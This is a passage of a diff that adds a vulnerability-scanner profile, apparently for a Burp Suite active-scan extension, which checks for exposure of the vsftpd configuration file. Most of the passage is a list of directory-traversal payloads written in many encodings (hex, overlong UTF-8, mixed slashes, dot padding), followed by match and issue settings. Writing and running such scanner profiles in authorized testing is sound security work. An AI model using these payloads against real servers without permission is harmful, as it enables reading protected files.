+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,..0x5c{FILE}",
+ "true,..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,///%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,\\\\\\%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..\\\\{FILE}",
+ "true,..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,./\\/./{FILE}",
+ "true,./\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..///{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Example config file"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-vsftpd-conf",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
